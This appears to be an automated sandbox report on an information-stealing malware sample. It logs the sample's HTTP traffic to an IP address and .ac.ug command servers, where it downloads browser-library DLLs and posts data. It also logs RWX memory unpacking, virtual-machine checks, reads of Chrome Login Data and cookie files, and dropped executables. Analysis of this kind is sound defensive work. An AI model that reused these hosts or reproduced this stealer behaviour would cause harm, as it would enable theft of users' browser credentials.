ntdll+0x1011a @ 0x773b011a system+0x1ebc85 @ 0x6bd1bc85 system+0x1f683b @ 0x6bd2683b system+0x1a5e44 @ 0x6bcd5e44 system+0x1fd8a0 @ 0x6bd2d8a0 system+0x1fd792 @ 0x6bd2d792 system+0x1a14bd @ 0x6bcd14bd 0x850084 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fec2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fed264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fed2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6ff874ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6ff87610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x70011dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x70011e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x70011f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7001416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72957f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72954de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7575b479 registers.esp: 2811856 registers.edi: 1990713288 registers.eax: 4259840 registers.ebp: 2812060 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (11 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://45.142.215.237/
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.142.215.237//l/f/nxZPunsBPvGyIjkLqZcB/6177c830445f6d0494ffcd9e25a157ee4342b34a
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.142.215.237//l/f/nxZPunsBPvGyIjkLqZcB/6936a2712329bb51d12294e3b6891e6d95b1d2d6
suspicious_features	POST method with no referer header	suspicious_request	POST http://mazoyer.ac.ug/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://mazooyaar.ac.ug/softokn3.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://mazooyaar.ac.ug/sqlite3.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://mazooyaar.ac.ug/freebl3.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://mazooyaar.ac.ug/mozglue.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://mazooyaar.ac.ug/msvcp140.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://mazooyaar.ac.ug/nss3.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET https://telete.in/brikitiki

Performs some HTTP requests (11 events)

request	POST http://45.142.215.237/
request	GET http://45.142.215.237//l/f/nxZPunsBPvGyIjkLqZcB/6177c830445f6d0494ffcd9e25a157ee4342b34a
request	GET http://45.142.215.237//l/f/nxZPunsBPvGyIjkLqZcB/6936a2712329bb51d12294e3b6891e6d95b1d2d6
request	POST http://mazoyer.ac.ug/index.php
request	POST http://mazooyaar.ac.ug/softokn3.dll
request	POST http://mazooyaar.ac.ug/sqlite3.dll
request	POST http://mazooyaar.ac.ug/freebl3.dll
request	POST http://mazooyaar.ac.ug/mozglue.dll
request	POST http://mazooyaar.ac.ug/msvcp140.dll
request	POST http://mazooyaar.ac.ug/nss3.dll
request	GET https://telete.in/brikitiki

Sends data using the HTTP POST Method (8 events)

request	POST http://45.142.215.237/
request	POST http://mazoyer.ac.ug/index.php
request	POST http://mazooyaar.ac.ug/softokn3.dll
request	POST http://mazooyaar.ac.ug/sqlite3.dll
request	POST http://mazooyaar.ac.ug/freebl3.dll
request	POST http://mazooyaar.ac.ug/mozglue.dll
request	POST http://mazooyaar.ac.ug/msvcp140.dll
request	POST http://mazooyaar.ac.ug/nss3.dll

Allocates read-write-execute memory (usually to unpack itself) (50 out of 4697 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0051a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00537000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72142000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00536000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00acb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00acf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08fc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0905f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x09050000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08fc1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08fc4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08fcb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08fcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08fcd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08fce000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0a860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 57344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0a861000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0a86f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0051c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x09051000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00660000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00661000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 3016 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceW Sept. 6, 2021, 6:20 p.m.	number_of_free_clusters: 3350085 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \\?\Volume{c2d901c4-0706-11e8-912e-806e6f6e6963}\ total_number_of_clusters: 8362495	1	1	0
GetDiskFreeSpaceExW Sept. 6, 2021, 6:20 p.m.	total_number_of_free_bytes: 13721014272 free_bytes_available: 13721014272 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Steals private information from local Internet browsers (50 out of 229 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF3a15fe.TMP\Web Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\Login Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Cookies
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Cookies
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\Login Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Cookies
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Login Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Cookies
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs-journal\Web Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

Creates executable files on the filesystem (50 out of 118 events)

file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-process-l1-1-0.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open.PNG.lnk
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\AccessibleHandler.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-math-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\MapiProxy.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-interlocked-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-multibyte-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-memory-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-rtlsupport-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\vcruntime140.dll
file	C:\ProgramData\softokn3.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-heap-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processenvironment-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-profile-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\ldap60.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processenvironment-l1-1-0.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\freebl3.dll
file	C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-convert-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-convert-l1-1-0.dll
